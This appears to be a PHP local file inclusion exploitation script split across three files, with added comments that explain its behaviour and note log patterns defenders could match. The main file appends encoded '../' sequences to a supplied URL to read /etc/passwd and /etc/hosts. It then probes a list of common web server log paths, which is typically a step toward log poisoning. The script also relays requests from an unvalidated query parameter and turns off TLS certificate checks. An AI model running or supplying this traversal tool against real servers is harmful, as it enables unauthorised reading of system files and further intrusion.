- //Lfi.php - Main file
- <?php
- //LFI exploitation script
- require("funcs.php");
- require("dirs.php");
- // Target base URL comes straight from this page's own query string (no validation),
- // so if this file is hosted it acts as a relay: the server makes outbound requests
- // to whatever URL a visitor supplies.
- $url = $_GET['u'];
- define(LIM, 10); //Limit of ../ to check
- define(RET, "..%2F");
- $toInject = $url;
- //Main loop to append ../
- // Each iteration issues two requests whose path is the base URL plus a growing run of
- // "..%2F" followed by "etc/passwd" or "etc/hosts"; on a hit, one more request per entry
- // of $logsDir follows. For defenders this is a noisy, easily-matched access-log pattern.
- for($c = 1; $c < LIM; $c++){
- $toInject = $toInject.RET; //Url with ../ appended
- $passwdTest = searchPasswd($toInject); //Look for /etc/passwd
- $hostsTest = searchHosts($toInject); //Look for /etc/hosts
- if($passwdTest || $hostsTest){
- echo $passwdTest." ".$hostsTest;
- testLogs($toInject, $logsDir); // $logsDir is the array declared in dirs.php
- die; // stop at the first traversal depth that returns a known file
- }
- }
- ?>
- //funcs.php - Functions file
- <?php
- //This function returns the body of $url.
- // Performs a GET with cURL and returns the raw response as a string; because
- // CURLOPT_HEADER is set, the returned text includes the response headers.
- // Returns false when the request fails or the server answers with an HTTP error
- // (CURLOPT_FAILONERROR). Redirects are followed (CURLOPT_FOLLOWLOCATION) with a 10s timeout.
- // Note: CURLOPT_SSL_VERIFYPEER is disabled, so TLS certificates are not validated at all.
- // $ua is not defined anywhere in this listing — presumably the cURL default (or no)
- // User-Agent is sent; verify. The handle is never released with curl_close().
- function getBody($url){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_VERBOSE, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $ua);
- curl_setopt($ch, CURLOPT_FAILONERROR, True);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
- curl_setopt($ch, CURLOPT_AUTOREFERER, True);
- curl_setopt($ch, CURLOPT_TIMEOUT, 10);
- curl_setopt($ch, CURLOPT_ENCODING, '');
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- $body = curl_exec($ch);
- return $body;
- }
- //This function returns the response size.
- // Issues the same request as getBody() (same options, same unverified TLS and
- // undefined $ua), discards the body, and returns curl_getinfo()['size_download'],
- // i.e. the number of body bytes downloaded. On a failed request the value is whatever
- // cURL reports for the handle (presumably 0) — verify before relying on it.
- // The handle is never released with curl_close().
- function getResponseSize($url){
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_VERBOSE, 1);
- curl_setopt($ch, CURLOPT_HEADER, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, $ua);
- curl_setopt($ch, CURLOPT_FAILONERROR, True);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, True);
- curl_setopt($ch, CURLOPT_AUTOREFERER, True);
- curl_setopt($ch, CURLOPT_TIMEOUT, 10);
- curl_setopt($ch, CURLOPT_ENCODING, '');
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
- curl_exec($ch);
- $info = curl_getinfo($ch);
- return $info['size_download'];
- }
- //This function checks whether /etc/passwd is reachable through $url.
- // Appends "etc/passwd" to $url (the "%00" suffix in $nb is declared but commented out,
- // so it is never sent), fetches the page, and returns the requested URL when the body
- // contains the literal root-account line; otherwise it falls off the end and returns null.
- // This is a plain substring check, so a page that merely echoes that string back
- // (e.g. a honeypot or a decoy) is reported as a hit too.
- function searchPasswd($url){
- $passwd = "etc/passwd";
- $nb = "%00";
- $toReq = $url.$passwd;//.$nb;
- $root = "root:x:0:0:root:/root:/bin/bash";
- $body = getBody($toReq);
- //echo $toReq."<br>";
- if(strpos($body, $root)) return $toReq;//echo $toReq."<br>";
- }
- //This function checks whether /etc/hosts is reachable through $url.
- // Same shape as searchPasswd(): appends "etc/hosts" (null-byte suffix commented out),
- // fetches the page, and returns the requested URL only when the body contains both
- // "127.0.0.1" and "localhost"; otherwise returns null implicitly.
- // Both markers are common in ordinary HTML as well, so this check is weaker than the
- // passwd one and more prone to false positives.
- function searchHosts($url){
- $hosts = "etc/hosts";
- $nb = "%00";
- $toReq = $url.$hosts;//.$nb;
- $ip = "127.0.0.1";
- $host = "localhost";
- $body = getBody($toReq);
- if(strpos($body, $ip) && strpos($body, $host)) return $toReq;//echo $toReq."<br>";
- }
- // For every candidate log path in $logsDir, requests $url.$dir and echoes the
- // downloaded size (one line per path). Nothing is returned and no body is shown;
- // the caller is expected to read the sizes by eye. $logsDir is passed by reference
- // but is never modified here.
- function testLogs($url, &$logsDir){
- echo "<br>";
- foreach ($logsDir as $dir):
- $currentTest = $url.$dir; //Url with returns with log appended
- echo getResponseSize($currentTest)."<br>";
- endforeach;
- }
- //dirs.php - This file contains common Apache directories
- <?php
- //This file contains an array with common logs directories
- // Relative (no leading slash) paths of common web-server and PHP log files; testLogs()
- // concatenates each onto a prefix that already ends in "..%2F". From a defender's side,
- // requests containing these suffixes right after a traversal run are a strong signal.
- $logsDir = array('error.log',
- 'error_log',
- 'etc/httpd/conf/logs/error_log',
- 'etc/httpd/logs/error_log',
- 'home/php5/logs/error_log',
- 'log/error.log',
- 'log/error_log',
- 'logs/error.log',
- 'logs/error_log',
- 'usr/local/apache/error.log',
- 'usr/local/apache/log/error_log',
- 'usr/local/apache/logs/error_log',
- 'usr/local/apache2/log/error_log',
- 'usr/local/apache2/logs/access_log',
- 'usr/local/apache2/logs/error.log',
- 'usr/local/apache2/logs/error_log',
- 'usr/local/apachessl/logs/error_log',
- 'usr/local/httpd/log/error_log',
- 'usr/local/httpd/logs/error_log',
- 'usr/local/php/log/error_log',
- 'var/apache2/logs/access_log',
- 'var/apache2/logs/error_log',
- 'var/log/apache/error_log',
- 'var/log/apache2/access.log',
- 'var/log/apache2/access_log',
- 'var/log/apache2/error.log',
- 'var/log/apache2/error_log',
- 'var/log/httpd-access.log',
- 'var/log/httpd-error.log',
- 'var/log/httpd/access_log',
- 'var/log/httpd/error_log',
- 'var/log/nginx/error.log',
- 'var/log/php-fcgi/error_log',
- 'var/log/php-fpm/err.log',
- 'var/www/logs/access_log',
- 'var/www/logs/error_log');
- ?>